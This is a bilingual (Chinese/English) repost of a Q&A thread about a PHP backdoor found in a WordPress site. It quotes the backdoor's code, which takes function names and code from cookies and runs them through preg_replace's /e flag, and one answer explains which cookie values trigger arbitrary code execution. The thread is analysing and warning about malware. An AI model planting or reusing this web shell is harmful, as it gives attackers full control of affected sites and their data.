从cookie执行PHP代码
[英]Execute PHP code from cookie
问题描述
I've found out such interesting code: 
我发现了这些有趣的代码:
class PluginJoomla {
public function __construct() {
$jq = @$_COOKIE['ContentJQ3'];
if ($jq) {
$option = $jq(@$_COOKIE['ContentJQ2']);
$au=$jq(@$_COOKIE['ContentJQ1']);
$option("/438/e",$au,438); die();
}
else
phpinfo();die;
}
}
$content = new PluginJoomla;
It was a part of WordPress website, so ignore the class name. 它是WordPress网站的一部分,因此请忽略类名。 As you can see the $jq variable gets it's value from some Cookie file. 正如您所看到的,$ jq变量从某个Cookie文件中获取它的值。 Later it seems to be treated like a function: 后来似乎被视为一个功能:
$jq(@$_COOKIE['ContentJQ2']);
As you can see here, it is a quite basic PHP thing with using Variable functions ( https://php.net/manual/en/functions.variable-functions.php ). 正如你在这里看到的,使用Variable函数( https://php.net/manual/en/functions.variable-functions.php )是一个非常基本的PHP。
Later $jq variable function returns a function for $option variable and string for $au variable: 稍后$ jq变量函数返回$ option变量的函数和$ au变量的字符串:
$option = $jq(@$_COOKIE['ContentJQ2']);
$au=$jq(@$_COOKIE['ContentJQ1']);
$option("/438/e",$au,438);
So, I have got a question, is it possible to do the same, but with executing a PHP code from Cookie file (considering not only exec() function, but also including such file with require() or using ob_start() and ob_get_clean())? 所以,我有一个问题,是否可以这样做,但是从Cookie文件执行PHP代码(不仅考虑exec()函数,还包括带有require()或ob_start()和ob_get_clean的文件())?
Also what do you think about the code itself, is it some kind of virus or malware? 您对代码本身有何看法,是某种病毒还是恶意软件?
2 个解决方案
解决方案1
4 2015-02-22 21:32:56
It is most definitely a malicous script. 这绝对是一个恶毒的剧本。 Let me guess, you found it in /wp-content/uploads/gravity_forms/... ? 让我猜一下,你在/ wp-content / uploads / gravity_forms / ...中找到了它? That's where I found it at a dozen sites where my customers did not update their gravity forms installation. 这就是我在十几个网站上找到它的地方,我的客户没有更新他们的重力表安装。 (Luckily /wp-content/uploads/*.php is blocked at my servers.) (幸运的是,我的服务器阻止了/wp-content/uploads/*.php。)
"$option("/438/e",$au,438);" “$选项(”/ 438 / E “$ AU,438);” means execute $au when $option is preg_replace, because of the /e flag. 意味着当$ option是preg_replace时执行$ au,因为/ e标志。
With $_COOKIE['ContentJQ3']="base64_decode", $_COOKIE['ContentJQ1']=base64("preg_replace") and $_COOKIE['ContentJQ2']=base64("arbitrary_php_code();"), this in the end executes any php code the hacker likes. 使用$ _COOKIE ['ContentJQ3'] =“base64_decode”,$ _COOKIE ['ContentJQ1'] = base64(“preg_replace”)和$ _COOKIE ['ContentJQ2'] = base64(“arbitrary_php_code();”),这到底执行黑客喜欢的任何PHP代码。 It can then be used to download ANY file from your filesystem (that PHP can access; remember open_basedir), do anything you like with your database. 然后它可以用来从你的文件系统下载任何文件(PHP可以访问;记住open_basedir),用你的数据库做任何你喜欢的事情。
If you find this file on your filesystem, please check your access log to see if you're hacked. 如果您在文件系统上找到此文件,请检查您的访问日志以查看您是否被黑客入侵。 If you can't prove you're not, please consider your website compromised. 如果您无法证明自己不是,请考虑您的网站遭到入侵。
解决方案2
0 2015-12-01 06:06:12
It's malicious all right! 这是恶意的! AVG identifies that as Linux/Roopre and it's bad news because, as @Geeklab has pointed out, it can execute anything in the context of your WP site. AVG认为它是Linux / Roopre并且它是坏消息,因为正如@Geeklab指出的那样,它可以在WP站点的上下文中执行任何操作。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.